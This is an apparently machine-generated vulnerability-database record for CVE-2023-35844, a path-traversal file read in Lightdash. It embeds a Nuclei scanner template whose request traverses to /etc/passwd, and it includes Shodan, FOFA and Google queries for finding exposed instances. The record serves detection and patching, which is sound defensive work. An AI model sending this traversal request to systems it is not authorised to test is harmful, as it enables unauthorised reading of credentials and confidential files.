{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2023-35844/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2023-35844/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2023-35844/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2023-35844/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2023-35844/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2023-35844"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2023-35844"
    }
  },
  "enrichments": {
    "cisa-kev": {
      "kev": false
    },
    "epss": {
      "epss": 0.06344,
      "kev": false,
      "percentile": 0.9333
    },
    "nuclei": {
      "nuclei": true,
      "nuclei_template": "http/cves/2023/CVE-2023-35844.yaml",
      "nuclei_template_severity": "high",
      "nuclei_template_yaml": "id: CVE-2023-35844\n\ninfo:\n  name: Lightdash version <= 0.510.3 Arbitrary File Read\n  author: dwisiswant0\n  severity: high\n  description: |\n    packages/backend/src/routers in Lightdash before 0.510.3\n    has insecure file endpoints, e.g., they allow .. directory\n    traversal and do not ensure that an intended file extension\n    (.csv or .png) is used.\n  impact: |\n    The vulnerability can lead to unauthorized access to sensitive information, potentially exposing user credentials, database credentials, and other confidential data.\n  remediation: |\n    Upgrade Lightdash to a version higher than 0.510.3 to mitigate the vulnerability.\n  reference:\n    - https://advisory.dw1.io/59\n    - https://nvd.nist.gov/vuln/detail/CVE-2023-35844\n    - https://github.com/lightdash/lightdash/commit/fcc808c84c2cc3afb343063e32a49440d32a553c\n    - https://github.com/lightdash/lightdash/compare/0.510.2...0.510.3\n    - https://github.com/lightdash/lightdash/pull/5090\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n    cvss-score: 7.5\n    cve-id: CVE-2023-35844\n    cwe-id: CWE-22\n    epss-score: 0.06344\n    epss-percentile: 0.9333\n    cpe: cpe:2.3:a:lightdash:lightdash:*:*:*:*:*:*:*:*\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: lightdash\n    product: lightdash\n    shodan-query:\n      - title:\"Lightdash\"\n      - http.title:\"lightdash\"\n    fofa-query: title=\"lightdash\"\n    google-query: intitle:\"lightdash\"\n  tags: cve,cve2023,lightdash,lfi,vkev,vuln\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/api/v1/slack/image/slack-image{{repeat('%2F..', 3)}}%2Fetc%2Fpasswd\"\n\n    matchers-condition: and\n    matchers:\n      - type: regex\n        regex:\n          - \"root:[x*]:0:0\"\n\n      - type: status\n        status:\n          - 200\n# digest: 4a0a00473045022042405f326436111297e851767abc5b5855e8d327d958aa8a6ba007c9fe3f079f022100962d4081b72fdac6d69d1a6665756cc8680528ea00625232e65e7354bcbac96c:922c64590222798bb761d5b6d8e72950"
    }
  },
  "vuln_id": "cve-2023-35844"
}